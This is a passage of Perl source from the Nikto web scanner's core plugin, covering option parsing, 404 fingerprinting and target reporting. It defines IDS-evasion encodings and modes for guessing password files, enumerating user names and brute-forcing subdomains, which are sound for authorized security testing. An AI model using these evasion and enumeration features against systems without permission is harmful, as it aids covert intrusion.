s/BID\\-([0-9]{4})/http:\\/\\/www.securityfocus.com\\/bid\\/$1/g;\n    $line =~ s/(MS([0-9]{2})\\-[0-9]{3})/https\\:\\/\\/docs\\.microsoft\\.com\\/en-us\\/security-updates\\/securitybulletins\\/20$2\\/$1/gi;\n\n    print $line . \"\\n\";\n\n    return;\n}\n\n###############################################################################\nsub get_ext {\n    my $uri = $_[0] || return;\n    if ($uri =~ /\\/$/) { return \"DIRECTORY\"; }\n    $uri =~ s/^.*\\///;\n    if ($uri =~ /^\\.[^.%]/) { return \"DOTFILE\"; }\n    $uri =~ s/[?&%].*$//;\n    if ($uri !~ /\\./) { return \"NONE\"; }\n    $uri =~ s/\\@[A-Z]+//;    # remove tokens\n    $uri =~ s/\\\".*$//;\n    $uri =~ s/^.*\\.//;\n    return $uri;\n}\n\n###############################################################################\nsub status_report {\n    my ($mark) = shift;\n    my $line;\n\n    # without this we could face a div by 0 error\n    if ($COUNTERS{'totalrequests'} eq 0 ||\n        $COUNTERS{'total_checks'} eq 0 ||\n        $COUNTERS{'total_targets'} eq 0) {\n        nprint(\"- STATUS: Starting up!\");\n        return;\n    }\n\n    my $secleft =\n      ((time() - $COUNTERS{'scan_start'}) / $COUNTERS{'totalrequests'}) *\n      (($COUNTERS{'total_checks'} * $COUNTERS{'total_targets'}) - $COUNTERS{'totalrequests'});\n    my $timeleft;\n    if ($secleft > 60) {\n        my $minleft = $secleft / 60;\n        $timeleft = sprintf(\"%.1f minutes\", $minleft);\n        if ($minleft > 60) {\n            my $hrsleft = $minleft / 60;\n            $timeleft = sprintf(\"%.1f hours\", $hrsleft);\n        }\n    }\n    else { $timeleft = sprintf(\"%.0f seconds\", $secleft); }\n\n    my $perc_compl =\n        ($COUNTERS{'totalrequests'} / ($COUNTERS{'total_checks'} * $COUNTERS{'total_targets'}) * 100);\n\n    $line = \"- STATUS: Completed $COUNTERS{'totalrequests'} requests\";\n    if ($COUNTERS{'total_targets'} > 1) {\n    \t$line .= \" (target \" . ($COUNTERS{'hosts_completed'} + 1) . \"/$COUNTERS{'total_targets'})\";\n\t}\n\n    if (($perc_compl < 100) && ($secleft > 0)) {\n\t$line .= sprintf(\" (~%.0f%% complete, $timeleft left)\", $perc_compl);\n\t}\n\n    if ($NIKTO{'current_plugin'} ne '') {\n\t$line .= \": currently in plugin '$NIKTO{'current_plugin'}'\";\n \t}\n\n    nprint($line);\n    nprint(\"- STATUS: \" . running_average_print($mark));\n\n    return;\n}\n###############################################################################\nsub date_disp {\n    my @time   = localtime($_[0]);\n    my $result = sprintf(\"%d-%02d-%02d %02d:%02d:%02d\",\n                         $time[5] + 1900,\n                         $time[4] + 1,\n                         $time[3], $time[2], $time[1], $time[0]);\n    return $result;\n}\n\n###############################################################################\nsub get_base_host {\n    my $uri = $_[0] || return;\n\n    # uri, protocol, host, port, params, frag, user, password.\n    my @hd   = LW2::uri_split($uri);\n    my $base = $hd[1] . \"://\" . $hd[2];\n    if (($hd[3] != 80) && ($hd[3] != 443)) { $base .= \":\" . $hd[3]; }\n    $base .= \"/\";\n    return $base;\n}\n\n###############################################################################\nsub map_codes {\n    my ($mark) = @_;\n    my %REQS;\n    my $rs = LW2::utils_randstr(8);\n\n    # / for OK response\n    my ($res, $content, $error, $request, $response) = nfetch($mark, \"/\", \"GET\", \"\", \"\", \"\", \"map_codes\");\n\n    if ($response->{'location'} ne '') {\n        nprint(\"+ Root page / redirects to: $response->{'location'}\");\n        if ($response->{'location'} =~ /^$mark->{'hostname'}/i)    # same host\n        {\n            my $uri = $response->{'location'};\n            ($res, $content, $error, $request, $response) =\n              nfetch($mark, \"/\", \"GET\", \"\", \"\", \"\", \"map_codes\");\n        }\n        else    # different host... ugh... just guess\n        {\n            $FoF{'okay'}{'response'} = 200;\n            $FoF{'okay'}{'type'}     = \"STD\";\n        }\n    }\n    else {\n        $FoF{'okay'}{'response'} = $res;\n        my $cooked = rm_active_content($content);\n        $FoF{'okay'}{'type'}  = \"HASH\";\n        $FoF{'okay'}{'match'} = LW2::md4($cooked);\n    }\n\n    # these are some used that may not be in the db_tests\n    if (defined $CLI{'mutate'}) {\n        $db_extensions{'bak'}  = 1;\n        $db_extensions{'data'} = 1;\n        $db_extensions{'dbc'}  = 1;\n        $db_extensions{'dbf'}  = 1;\n        $db_extensions{'lst'}  = 1;\n        $db_extensions{'htx'}  = 1;\n        $db_extensions{'htm'}  = 1;\n        $db_extensions{'html'}  = 1;\n        $db_extensions{'ini'}  = 1;\n        $db_extensions{'lst'}  = 1;\n        $db_extensions{'txt'}  = 1;\n        $db_extensions{'xml'}  = 1;\n        $db_extensions{'php'}  = 1;\n        $db_extensions{'php3'}  = 1;\n    }\n\n    foreach my $ext (keys %db_extensions) {\n        if (   $ext ne \"DIRECTORY\"\n            && $ext ne \"NONE\"\n            && $ext ne \"DOTFILE\") {\n            $REQS{\"/$rs.$ext\"} = $ext;\n        }\n    }\n    undef $db_extensions;\n\n    # add those generic type holders back as real files\n    $REQS{\"/$rs/\"} = \"DIRECTORY\";\n    $REQS{\"/$rs\"}  = \"NONE\";\n    $REQS{\"/.$rs\"} = \"DOTFILE\";\n\n    foreach my $file (keys %REQS) {\n        return if $mark->{'terminate'};\n        nprint(\"- Testing error for file: \" . $mark->{'root'} . $file . \"\\n\", \"v\");\n        ($res, $content, $error, $request, $response) = nfetch($mark, $file, \"GET\", \"\", \"\", \"\", \"map_codes\");\n\n        $ext = $REQS{$file};\n        $FoF{$ext}{'response'} = $res;\n\n        # handle .com to .org redirs or whatnot\n        if ($response->{'location'} ne '') {\n            $FoF{$ext}{'location'} = get_base_host($response->{'location'});\n        }\n\n        # if it is not specific type, figure out Content or HASH method...\n        if ($FoF{$ext}{'response'} eq 404) { $FoF{$ext}{'mode'} = \"STD\"; next; }\n        elsif ($FoF{$ext}{'response'} eq 200) { $FoF{$ext}{'mode'} = \"OK\"; }\n        elsif ($FoF{$ext}{'response'} eq 410) { $FoF{$ext}{'mode'} = \"STD\"; next; }\n        elsif ($FoF{$ext}{'response'} eq 401) { $FoF{$ext}{'mode'} = \"STD\"; next; }\n        elsif ($FoF{$ext}{'response'} eq 403) { $FoF{$ext}{'mode'} = \"STD\"; next; }\n        elsif ($FoF{$ext}{'response'} eq 300) { $FoF{$ext}{'mode'} = \"REDIR\"; next; }\n        elsif ($FoF{$ext}{'response'} eq 301) { $FoF{$ext}{'mode'} = \"REDIR\"; next; }\n        elsif ($FoF{$ext}{'response'} eq 302) { $FoF{$ext}{'mode'} = \"REDIR\"; next; }\n        elsif ($FoF{$ext}{'response'} eq 303) { $FoF{$ext}{'mode'} = \"REDIR\"; next; }\n        elsif ($FoF{$ext}{'response'} eq 307) { $FoF{$ext}{'mode'} = \"REDIR\"; next; }\n        else                                  { $FoF{$ext}{'mode'} = \"OTHER\"; }\n\n        # if we've got an OK/OTHER response, look at content first\n        # blank content, or hash...\n        if (length($content) == 0) {\n            nprint(\"- OK/OTHER type settled on: BLANK\\n\", \"v\");\n            $FoF{$ext}{'type'}  = \"BLANK\";\n            $FoF{$ext}{'match'} = \"\";\n        }\n        else {\n            nprint(\"- OK/OTHER type settled on: HASH\\n\", \"v\");\n            my $cooked = rm_active_content($content, $file);\n            $FoF{$ext}{'type'}  = \"HASH\";\n            $FoF{$ext}{'match'} = LW2::md4($cooked);\n        }\n    }\n\n    # lastly, get a hash of index.php so we can cut down on some false positives...\n    ($res, $content, $error, $request, $response) =\n      nfetch($mark, \"/index.php?\", \"GET\", \"\", \"\", \"\", \"map_codes\");\n\n    my $cooked = rm_active_content($content, \"/index.php\");\n    $FoF{'index.php'}{'match'} = LW2::md4($cooked);\n    $FoF{'index.php'}{'type'}  = \"HASH\";\n\n    return;\n}\n\n###############################################################################\nsub rm_active_content {\n\n    # Try to remove active content which could mess up the file's signature\n    my ($cont, $file) = @_;\n\n    # Dates/Times\n    $cont =~ s/[12][0-9]{3}[-.\\/][1-3]?[0-9][-.\\/][1-3]?[0-9]//g;    # 2001-12-12\n    $cont =~ s/[1-3]?[0-9][-.\\/][1-3]?[0-9][-.\\/][12][0-9]{3}//g;    # 12-12-2002\n    $cont =~ s/[0-9]{8,14}//g;                                       # timestamp\n    $cont =~ s/[0-9]{6}//g;                                          # timestamp\n    $cont =~ s/[0-9]{2}:[0-9]{2}(?::[0-9]{2})?//g;                   # 12:11:33\n    $cont =~\n      s/(?:mon|tue|wed|thu|fri|sat|sun),? [1-3]?[0-9] (?:jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)//ig;\n    $cont =~ s/[12][0-9]{3}\\s?(?:jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\\s?[1-3]?[0-9]//gi\n      ;                                                              # 2009 jan 29\n    $cont =~\n      s/[1-3]?[0-9]\\s?(?:jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)[, ]?(?:[12][0-9]{3})?//gi\n      ;                                                              # 29 Jan 2009\n    $cont =~ s/[0-9\\.]+ second//gi;                                  # page load time\n    $cont =~ s/[0-9]+ queries//gi;                                   # wordpress\n\n    # URI, if provided, plus encoded versions of it\n    # $_[1] has unescaped file name, and $file has escaped. use appropriate one!\n    if ($file ne '') {\n        $file = quotemeta($file);\n        $cont =~ s/$file//g;\n\n        # base 64\n        my $e = LW2::encode_base64($_[1]);\n        $cont =~ s/$e//gs;\n\n        # hex encoded\n        $e = LW2::encode_uri_hex($_[1]);\n        $cont =~ s/$e//gs;\n\n        # unicode encoded\n        $e = LW2::encode_unicode($_[1]);\n        $e = quotemeta($e);\n        $cont =~ s/$e//gs;\n\n        # url encoding, full url\n        $e = $_[1];\n        $e    =~ s/([^A-Za-z0-9])/sprintf(\"%%%02X\", ord($1))/seg;\n        $cont =~ s/$e//gs;\n\n        # url encoding, query portion\n        if ($file =~ /\\?(.*$)/) {\n            my $qs = $1;\n\n            # match pages which link to themselves w/diff args\n            $cont =~ s/$qs//gs;\n\n            # url encoded\n            $qs   =~ s/([^A-Za-z0-9])/sprintf(\"%%%02X\", ord($1))/seg;\n            $cont =~ s/$qs//gs;\n        }\n    }\n\n    return $cont;\n}\n\n###############################################################################\nsub dump_target_info {\n    my ($mark) = @_;\n    my $sslprint = \"\";\n\n    if ($mark->{ssl}) {\n\n        $sslprint = \"$VARIABLES{'DIV'}\\n\";\n        $sslprint .= \"+ SSL Info:        Subject:  $mark->{'ssl_cert_subject'}\\n\";\n        $sslprint .= \"                   Altnames: $mark->{'ssl_cert_altnames'}\\n\" if $mark->{'ssl_cert_altnames'} ne '';\n        $sslprint .= \"                   Ciphers:  $mark->{'ssl_cipher'}\\n\";\n        $sslprint .= \"                   Issuer:   $mark->{'ssl_cert_issuer'}\";\n    }\n\n    if ($CLI{'plugins'} ne '@@NONE') {\n        if ($mark->{ip} =~ /[a-z]/i) {\n            nprint(\"+ Target IP:          (proxied)\", \"\", $mark);\n        }\n        else {\n            nprint(\"+ Target IP:          $mark->{ip}\", \"\", $mark);\n        }\n\n        nprint(\"+ Target Hostname:    $mark->{hostname}\", \"\", $mark);\n        nprint(\"+ Target Port:        $mark->{port}\");\n        if (defined $CLI{'root'}) {\n            nprint(\"+ Target Path:        $CLI{'root'}\");\n        }\n\n        if ((defined $CLI{'vhost'}) && ($CLI{'vhost'} ne $mark->{hostname})) {\n            nprint(\"+ Virtual Host:       $CLI{'vhost'}\", \"\", $mark);\n        }\n\n        if ($request{'whisker'}->{'proxy_host'} ne '') {\n            nprint(\n                \"+ Proxy:              $request{'whisker'}->{'proxy_host'}:$request{'whisker'}->{'proxy_port'}\"\n                );\n        }\n\n        if ($mark->{ssl}) {\n            nprint($sslprint);\n        }\n\n        if (defined $NIKTO{'anti_ids'} && defined $CLI{'evasion'}) {\n            for (my $i = 1 ; $i <= (keys %{ $NIKTO{'anti_ids'} }) ; $i++) {\n                if ($CLI{'evasion'} =~ /$i/) {\n                    nprint(\"+ Using Encoding:     $NIKTO{'anti_ids'}{$i}\");\n                }\n            }\n        }\n        if (defined $NIKTO{'mutate_opts'} && defined $CLI{'mutate'}) {\n            for (my $i = 1 ; $i <= (keys %{ $NIKTO{'mutate_opts'} }) ; $i++) {\n                if ($CLI{'mutate'} =~ /$i/) {\n                    nprint(\"+ Using Mutation:     $NIKTO{'mutate_opts'}{$i}\");\n                }\n            }\n        }\n\n\tif (defined $mark->{'messages'}) {\n\t\tmy @msgs = @{ $mark->{'messages'} };\n\t\tforeach my $m (@msgs) {\n        \t\tnprint(\"+ Message:            $m\");\n\t\t}\n\t}\n\n        my $time = date_disp($mark->{start_time});\n        nprint(\"+ Start Time:         $time (GMT$VARIABLES{'GMTOFFSET'})\");\n        nprint($VARIABLES{'DIV'});\n    }\n\n    if ($mark->{banner} ne \"\") {\n        nprint(\"+ Server: $mark->{banner}\");\n    }\n    else {\n        nprint(\"+ Server: No banner retrieved\");\n    }\n\n    return;\n}\n\n###############################################################################\nsub general_config {\n    ## gotta set these first\n    $| = 1;\n    # internal array, this should never be used outside this sub\n    my @options;\n\n    # This is used in dump_target_info(), not just help output\n    $NIKTO{'anti_ids'}{'1'} = \"Random URI encoding (non-UTF8)\";\n    $NIKTO{'anti_ids'}{'2'} = \"Directory self-reference (/./)\";\n    $NIKTO{'anti_ids'}{'3'} = \"Premature URL ending\";\n    $NIKTO{'anti_ids'}{'4'} = \"Prepend long random string\";\n    $NIKTO{'anti_ids'}{'5'} = \"Fake parameter\";\n    $NIKTO{'anti_ids'}{'6'} = \"TAB as request spacer\";\n    $NIKTO{'anti_ids'}{'7'} = \"Change the case of the URL\";\n    $NIKTO{'anti_ids'}{'8'} = \"Use Windows directory separator (\\\\)\";\n    $NIKTO{'anti_ids'}{'A'} = \"Use a carriage return (0x0d) as a request spacer\";\n    $NIKTO{'anti_ids'}{'B'} = \"Use binary value 0x0b as a request spacer\";\n\n    # This is used in dump_target_info(), not just help output\n    $NIKTO{'mutate_opts'}{'1'} = \"Test all files with all root directories\";\n    $NIKTO{'mutate_opts'}{'2'} = \"Guess for password file names\";\n    $NIKTO{'mutate_opts'}{'3'} = \"Enumerate user names via Apache (/~user type requests)\";\n    $NIKTO{'mutate_opts'}{'4'} = \"Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)\";\n    $NIKTO{'mutate_opts'}{'5'} = \"Attempt to brute force sub-domain names, assume that the host name is the parent domain\";\n    $NIKTO{'mutate_opts'}{'6'} = \"Attempt to guess directory names from the supplied dictionary file\";\n\n    ### CLI STUFF\n    $CLI{'pause'} = $CLI{'html'} = $OUTPUT{'verbose'} = $CLI{'skiplookup'} =\n      $COUNTERS{'totalrequests'} = $OUTPUT{'debug'} = $OUTPUT{'scrub'} = $OUTPUT{'errors'} = 0;\n    $CLI{'all_options'} = join(\" \", @ARGV);\n    $CLI{'all_options'} =~ s/(\\-id?\\s[^\\s:]+:)[^\\s]+/$1****/i;\n\n    GetOptions(\"ask=s\"            => \\$CLI{'ask'},\n               \"Cgidirs=s\"        => \\$CLI{'forcecgi'},\n               \"config=s\"         => \\$CLI{'config'},\n               \"dbcheck\"          => \\&check_dbs,\n               \"Display=s\"        => \\$CLI{'display'},\n               \"evasion=s\"        => \\$CLI{'evasion'},\n               \"findonly\"         => \\$CLI{'findonly'},\n               \"Format=s\"         => \\$CLI{'format'},\n               \"Help\"             => \\&usage,\n               \"host=s\"           => \\$CLI{'host'},\n               \"id=s\"             => \\$CLI{'hostauth'},\n               \"key=s\"            => \\$CLI{'key'},\n               \"list-plugins\"     => \\&list_plugins,\n               \"maxtime=s\"        => \\$CLI{'maxtime'},\n               \"mutate-options=s\" => \\$CLI{'mutate-options'},\n               \"mutate=s\"         => \\$CLI{'mutate'},\n               \"no404\"            => \\$CLI{'nofof'},\n               \"nointeractive\"    => \\$CLI{'nointeractive'},\n               \"nolookup\"         => \\$CLI{'skiplookup'},\n               \"nossl\"            => \\$CLI{'nossl'},\n               \"Option=s\"         => \\@options,\n               \"output=s\"         => \\$CLI{'file'},\n               \"Pause=f\"          => \\$CLI{'pause'},\n               \"Plugins=s\"        => \\$CLI{'plugins'},\n               \"RSAcert=s\"        => \\$CLI{'cert'},\n               \"port=s\"           => \\$CLI{'ports'},\n               \"root=s\"           => \\$CLI{'root'},\n               \"ssl\"              => \\$CLI{'ssl'},\n               \"Save=s\"           => \\$CLI{'saveresults'},\n               \"timeout=i\"        => \\$CLI{'timeout'},\n               \"Tuning=s\"         => \\$CLI{'tuning'},\n               \"until:s\"          => \\$CLI{'until'},\n               \"update\"           => \\&check_updates,\n               \"Userdbs:s\"        => \\$CLI{'userdbs'},\n               \"useproxy:s\"       => \\$CLI{'useproxy'},\n               \"useragent=s\"      => \\$CLI{'useragent'},\n               \"url=s\"            => \\$CLI{'host'},\n               \"Version\"          => \\&version,\n               \"vhost=s\"          => \\$CLI{'vhost'},\n               \"404string=s\"      => \\$CLI{'404string'},\n               \"404code=s\"        => \\$CLI{'404code'},\n               ) or usage();\n\n    # both -host and -url\n    if (($CLI{'host'} ne '') && ($CLI{'url'} ne '')) {\n        nprint(\"+ ERROR: Cannot use -url and -host at the same time\");\n        exit 1;\n\t}\n\n    # 404string\n    if ($CLI{'404string'} ne '') {\n        my $s = validate_and_fix_regex($CLI{'404string'});\n        $VARIABLES->{'ERRSTRINGS'}->{$s} = 1;\n        }\n\n    # 404code\n    if ($CLI{'404code'} ne '') {\n        foreach my $code (split(/\\s?,\\s?/, $CLI{'404code'})) {\n            if ($code =~ /[^\\d]/) {\n                 nprint(\"+ ERROR: Invalid 404code, must be an integer\");\n                 exit 1;\n                 }\n            $VARIABLES->{'ERRCODES'}->{$code} = 1;\n        }\n    }\n\n    # Maxtime must be seconds\n    if ($CLI{'maxtime'} ne '') {\n        $CLI{'maxtime'} = time_to_seconds($CLI{'maxtime'});\n        if ($CLI{'maxtime'} eq '') {\n            nprint(\"+ ERROR: Invalid maxtime value, must be a valid time (e.g., 3600s, 60m, 1h)\");\n            exit 1;\n        }\n    }\n\n    # Until\n    if ($CLI{'until'} ne '') {\n\n        # if a number of hours/mins/secs, convert to a time to pause\n        my $pausetime;\n        my $now = time();\n        if ($CLI{'until'} =~ /[hms]$/i) {\n            my $gotime = time_to_seconds($CLI{'until'});\n            if ($gotime eq '') {\n                nprint(\n                    \"+ ERROR: Invalid until value, must be a valid time (e.g., 3600s, 60m, 1h) or a time (e.g., 03:00)\"\n                    );\n                exit 1;\n            }\n\n            # convert to a pausetime\n            $pausetime = $now + $gotime;\n        }\n        elsif ($CLI{'until'} =~ /\\d\\d:\\d\\d:?(?:\\d\\d)?$/) {\n\n            # convert until time to epoch time\n            # format: (mm dd)? hh:mm:ss\n            $CLI{'until'} =~ /^(?:(\\d\\d)(?:\\s|\\/)(\\d\\d))?(?:\\s|\\/)?(\\d?\\d):(\\d\\d):?(\\d\\d)?$/;\n            my ($month, $day, $hh, $mm, $ss) = ($1, $2, $3, $4, $5);\n            $ss = '00' if $ss eq '';\n\n            # get year and complete month/day info\n            (undef, undef, undef, $cday, $cmon, $year) = localtime(time);\n            $year += 1900;\n            $day = $cday if $day eq '';\n            if ($month eq '') {\n                $month = $cmon;\n            }\n            else {\n                $month--;\n            }\n\n            $pausetime = timelocal($ss, $mm, $hh, $day, $month, $year);\n        }\n\n        if ($now > $pausetime) {\n            nprint(\"+ ERROR: Pause time is in the past.\");\n            exit 1;\n        }\n        $CLI{'until'} = $pausetime;\n    }\n\n    if ($CLI{'useragent'}) {\n        push(@options,\"USERAGENT=\" . $CLI{'useragent'});\n    }\n\n    # options allows overriding of nikto.conf entries on command line\n    foreach my $option (@options) {\n        my @optione=split(\"=\", $option, 2);\n        $CONFIGFILE{$optione[0]}=$optione[1];\n    }\n\n    # deprecated -findonly overrides -Plugins\n    if ($CLI{'findonly'}) {\n        $CLI{'plugins'} =\n          '@@NONE;report_csv;report_json;report_sqlg;report_html;report_text;report_xml;report_nbe';\n    }\n\n    # Userdb type: blank is db_tests only, so 'all' is only valid option\n    if (defined($CLI{'userdbs'})) {\n        if   ($CLI{'userdbs'} =~ /^all$/i) { $CLI{'userdbs'} = 'all'; }\n        else                               { $CLI{'userdbs'} = 'tests'; }\n    }\n\n    # CLI proxy overrides nikto.conf\n    if ((defined($CLI{'useproxy'})) && ($CLI{'useproxy'} ne '')) {\n        if ($CLI{'useproxy'} !~ /^https?:\\/\\//) { $CLI{'useproxy'} = \"http://$CLI{'useproxy'}\"; }\n        my @prox = LW2::uri_split($CLI{'useproxy'});\n        $CONFIGFILE{'PROXYHOST'} = $prox[2];\n        $CONFIGFILE{'PROXYPORT'} = $prox[3];\n        $CONFIGFILE{'PROXYUSER'} = $prox[6];\n        $CONFIGFILE{'PROXYPASS'} = $prox[7];\n    }\n    elsif (defined($CLI{'useproxy'})) { $CLI{'useproxy'} = 1; }\n    else {\n      undef $CONFIGFILE{'PROXYHOST'};\n      undef $CONFIGFILE{'PROXYPORT'};\n      undef $CONFIGFILE{'PROXYUSER'};\n      undef $CONFIGFILE{'PROXYPASS'};\n    }\n\n    # Save Results\n    if (defined($CLI{'saveresults'})) {\n        if ($CLI{'saveresults'} eq '') {\n            nprint(\"+ ERROR: -Save must have a directory name or '.' for auto-generated\");\n            exit 1;\n        }\n        eval \"require JSON::PP\";\n        if ($@) {\n            nprint(\"+ ERROR: Module JSON::PP missing.\");\n            exit 1;\n        }\n    }\n\n    # port(s)\n    if (defined $CLI{'ports'}) {\n        $CLI{'ports'} =~ s/^\\s+//;\n        $CLI{'ports'} =~ s/\\s+$//;\n        if ($CLI{'ports'} =~ /[^0-9\\-\\, ]/) {\n            nprint(\"+ ERROR: Invalid port option '$CLI{'ports'}'\");\n            exit 1;\n        }\n    }\n\n    # auto-generate file name\n    if (($CLI{'file'} eq '.') && ($CLI{'format'} eq '')) {\n            nprint(\"+ ERROR: Output format must be used with auto file naming\");\n            exit 1;\n        }\n\n    if ($CLI{'file'} eq '.') {\n\n        my $hn = $CLI{'host'};\n        $hn =~ s/[^a-zA-Z0-9\\.\\-\\_]/_/g;\n        $hn =~ s/_+/_/g;\n        my $port = $CLI{'ports'};\n        $port =~ s/,/\\-/g;\n        $port =~ s/[^a-zA-Z0-9\\.\\-\\_]/_/g;\n        my $now = date_disp(time());\n        $now =~ s/[^0-9-]/-/g;\n        $CLI{'file'} = \"nikto_\" . $hn . \"_\" . $port . \"_\" . $now . \".\" . $CLI{'format'};\n        $CLI{'file'} =~ s/_+/_/g;\n\n        # exists?\n        if (-e $CLI{'file'}) {\n            $CLI{'file'} =~ /^(.*)(\\.[a-z]{3})/;\n            my $fn     = $1;\n            my $ext    = $2;\n            my $ctr    = 0;\n            my $exists = 1;\n            while ($exists) {\n                $ctr++;\n                if (!-e $fn . \"_\" . $ctr . $ext) {\n                    $CLI{'file'} = $fn . \"_\" . $ctr . $ext;\n                    $exists = 0;\n                }\n            }\n        }\n        nprint(\"- Auto-generated save file: $CLI{'file'}\", \"v\");\n    }\n\n    # output file\n    if (!defined $CLI{'format'}) {\n\n        # Check what output has\n        $CLI{'format'} = \"none\";\n        if (defined $CLI{'file'}) {\n            $CLI{'format'} = lc($CLI{'file'});\n            $CLI{'format'} =~ s/(^.*\\.)([^.]*$)/$2/g;\n        }\n    }\n\n    $CLI{'format'}=lc($CLI{'format'});\n    $CLI{'format'}='txt' if $CLI{'format'} eq 'text';\n    $CLI{'format'}='htm' if $CLI{'format'} eq 'html';\n\n    if ($CLI{'format'} !~ /^(?:txt|htm|csv|json|sql|nbe|xml|none)$/) {\n        nprint(\"+ ERROR: Invalid output format\");\n        exit 1;\n\t}\n\n    if ((defined $CLI{'file'}) && ($CLI{'format'} eq \"\")) {\n        nprint(\"+ERROR: Output file specified without a format\");\n        exit 1;\n    }\n\n    if ((!defined $CLI{'file'}) && ($CLI{'format'} ne \"none\")) {\n        nprint(\"+ERROR: Output file format specified without a name\");\n        exit 1;\n    }\n\n    # verify readable dtd\n    if ($CLI{'format'} eq 'xml' && $CONFIGFILE{'NIKTODTD'} != \"\") {\n        nprint(\"+ ERROR: DTD not defined\");\n        exit 1;\n    }\n\n    # screen output\n    if (defined $CLI{'display'}) {\n        if ($CLI{'display'} =~ /d/i) { $OUTPUT{'debug'}          = 1; }\n        if ($CLI{'display'} =~ /v/i) { $OUTPUT{'verbose'}        = 1; }\n        if ($CLI{'display'} =~ /s/i) { $OUTPUT{'scrub'}          = 1; }\n        if ($CLI{'display'} =~ /e/i) { $OUTPUT{'errors'}         = 1; }\n        if ($CLI{'display'} =~ /p/i) { $OUTPUT{'progress'}       = 1; }\n        if ($CLI{'display'} =~ /1/i) { $OUTPUT{'show_redirects'} = 1; }\n        if ($CLI{'display'} =~ /2/i) { $OUTPUT{'show_cookies'}   = 1; }\n        if ($CLI{'display'} =~ /3/i) { $OUTPUT{'show_ok'}        = 1; }\n        if ($CLI{'display'} =~ /4/i) { $OUTPUT{'show_auth'}      = 1; }\n    }\n\n    # Fixup\n    if (defined $CLI{'root'}) {\n        $CLI{'root'} =~ s/\\/$//;\n        if (($CLI{'root'} !~ /^\\//) && ($CLI{'root'} ne \"\")) { $CLI{'root'} = \"/$CLI{'root'}\"; }\n    }\n\n    if (defined $CLI{'hostauth'}) {\n        my @x = split(/:/, $CLI{'hostauth'});\n        if (($#x > 2) || ($x[0] eq \"\")) {\n            nprint(\n                \"+ ERROR: \\'$CLI{'hostauth'}\\' (-i option) syntax is 'user:password' or 'user:password:domain' for host authentication.\"\n                );\n            exit 1;\n        }\n    }\n\n    if (defined $CLI{'evasion'}) {\n        $CLI{'evasion'} =~ s/[^1-8AB]//g;\n    }\n\n    if (!defined $CLI{'plugins'} || $CLI{'plugins'} eq \"\") {\n        $CLI{'plugins'} = '@@DEFAULT';\n    }\n\n    # Mapping for mutate for plugins\n    if (defined $CLI{'mutate'}) {\n        if ($CLI{'mutate'} =~ /1/ || $CLI{'mutate'} =~ /2/) {\n            my $parameters;\n            $parameters = \"passfiles\" if ($CLI{'mutate'} =~ /2/);\n            $parameters .= \",all\" if ($CLI{'mutate'} =~ /1/);\n            $CLI{'plugins'} .= ';tests(' . $parameters . ')';\n        }\n        if ($CLI{'mutate'} =~ /3/ || $CLI{'mutate'} =~ /4/) {\n            my $parameters;\n            $parameters = \"enumerate\";\n            $parameters .= \",home\"    if ($CLI{'mutate'} =~ /3/);\n            $parameters .= \",cgiwrap\" if ($CLI{'mutate'} =~ /4/);\n            $parameters .= \",dictionary:\" . $CLI{'mutate-options'}\n              if (defined $CLI{'mutate-options'});\n            $CLI{'plugins'} .= ';apacheusers(' . $parameters . ')';\n        }\n        if ($CLI{'mutate'} =~ /5/) {\n            $CLI{'plugins'} .= \";subdomain\";\n        }\n        if ($CLI{'mutate'} =~ /6/) {\n            $CLI{'plugins'} .= ';dictionary(dictionary:' . $CLI{'mutate-options'} . ')';\n        }\n        nprint(\n            \"- Mutate is deprecated, use -Plugins instead. The following option can be used in future: -Plugin $CLI{'plugins'}\"\n            );\n    }\n    else {\n        undef $NIKTO{'mutate_opts'};    # we don't need this any more\n    }\n\n    # Asking questions?\n    if ($CLI{'ask'} =~ /^(?:auto|yes|no)$/) {\n        $CONFIGFILE{'UPDATES'} = $CLI{'ask'};    # override nikto.conf setting\n        undef($CLI{'ask'});\n    }\n\n    $CLI{'timeout'} = $CLI{'timeout'} || 10;\n\n    # Set up User-Agent\n    $VARIABLES{'useragent'} = $CONFIGFILE{'USERAGENT'};\n    $VARIABLES{'useragent'} =~ s/\\@VERSION/$VARIABLES{'version'}/g;\n    my $ev = $CLI{'evasion'} || \"None\";\n    $VARIABLES{'useragent'} =~ s/\\@EVASIONS/$ev/g;\n\n    # RFI URL -- push it to VARIABLES\n    if (defined $CONFIGFILE{'RFIURL'}) {\n        $VARIABLES{'@RFIURL'} = $CONFIGFILE{'RFIURL'};\n    }\n    else {\n        nprint(\"- ***** RFIURL is not defined in nikto.conf--no RFI tests will run *****\");\n    }\n\n    # SSL Test\n    if (!LW2::ssl_is_available()) {\n        nprint(\"- ***** SSL support not available (see docs for SSL install) *****\");\n    }\n\n    # get core version\n    open(FI, \"<$CONFIGFILE{'PLUGINDIR'}/nikto_core.plugin\");\n    my @F = <FI>;\n    close(FI);\n    my @VERS = grep(/^#VERSION/, @F);\n    $VARIABLES{'core_version'} = $VERS[0];\n    $VARIABLES{'core_version'} =~ s/\\#VERSION,//;\n    chomp($VARIABLES{'core_version'});\n    $VARIABLES{'TEMPL_HCTR'} = 0;\n\tif ($^O !~ /MSWin32/) {\n\t\t$NIKTO{'POSIX'}{'fd_stdin'} = fileno(STDIN);\n\t\t$NIKTO{'POSIX'}{'term'}     = POSIX::Termios->new();\n\t\t$NIKTO{'POSIX'}{'term'}->getattr($fd_stdin);\n\t\t$NIKTO{'POSIX'}{'oterm'}  = $NIKTO{'POSIX'}{'term'}->getlflag();\n\t\t$NIKTO{'POSIX'}{'echo'}   = ECHOE | ECHO | ECHOK | ICANON;\n\t\t$NIKTO{'POSIX'}{'noecho'} = $oterm & ~$echo;\n\t}\n\n    if ($CLI{'pause'} > 0) {\n        nprint(\"-***** Pausing $CLI{'pause'} second(s) per request\");\n    \t}\n\n    # Default values\n    $COUNTERS{'totalrequests'} = 0;\n    $COUNTERS{'total_checks'}  = 0;\n    $COUNTERS{'total_targets'} = 0;\n\n    return;\n}\n\n###############################################################################\nsub time_to_seconds {\n    my $time = $_[0] || return;\n    if ($time =~ /m$/i) {\n        $time =~ s/m$//i;\n        $time = ($time * 60);\n    }\n    elsif ($time =~ /h$/i) {\n        $time =~ s/h$//i;\n        $time = ($time * 3600);\n    }\n    elsif ($time =~ /s$/i) {\n        $time =~ s/s$//i;\n    }\n    return $time;\n}\n\n###############################################################################\nsub sleeper {\n    